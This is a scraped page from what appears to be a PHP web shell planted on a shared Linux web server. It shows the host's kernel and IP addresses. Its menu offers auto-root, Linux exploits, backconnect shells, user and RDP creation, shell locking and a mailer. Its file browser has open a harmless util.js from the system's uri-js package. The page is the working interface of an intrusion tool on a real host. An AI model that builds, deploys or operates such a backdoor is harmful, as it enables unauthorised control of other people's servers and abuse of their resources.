Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
uri-js /
dist /
esnext /
[ HOME SHELL ]
Name
Size
Permission
Action
schemes
[ DIR ]
drwxr-xr-x
index.d.ts
23
B
-rw-r--r--
index.js
537
B
-rw-r--r--
index.js.map
747
B
-rw-r--r--
regexps-iri.d.ts
97
B
-rw-r--r--
regexps-iri.js
114
B
-rw-r--r--
regexps-iri.js.map
192
B
-rw-r--r--
regexps-uri.d.ts
160
B
-rw-r--r--
regexps-uri.js
7.63
KB
-rw-r--r--
regexps-uri.js.map
8.1
KB
-rw-r--r--
uri.d.ts
2.63
KB
-rw-r--r--
uri.js
19.68
KB
-rw-r--r--
uri.js.map
18.92
KB
-rw-r--r--
util.d.ts
343
B
-rw-r--r--
util.js
1.09
KB
-rw-r--r--
util.js.map
1.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.js
export function merge(...sets) { if (sets.length > 1) { sets[0] = sets[0].slice(0, -1); const xl = sets.length - 1; for (let x = 1; x < xl; ++x) { sets[x] = sets[x].slice(1, -1); } sets[xl] = sets[xl].slice(1); return sets.join(''); } else { return sets[0]; } } export function subexp(str) { return "(?:" + str + ")"; } export function typeOf(o) { return o === undefined ? "undefined" : (o === null ? "null" : Object.prototype.toString.call(o).split(" ").pop().split("]").shift().toLowerCase()); } export function toUpperCase(str) { return str.toUpperCase(); } export function toArray(obj) { return obj !== undefined && obj !== null ? (obj instanceof Array ? obj : (typeof obj.length !== "number" || obj.split || obj.setInterval || obj.call ? [obj] : Array.prototype.slice.call(obj))) : []; } export function assign(target, source) { const obj = target; if (source) { for (const key in source) { obj[key] = source[key]; } } return obj; } //# sourceMappingURL=util.js.map
Close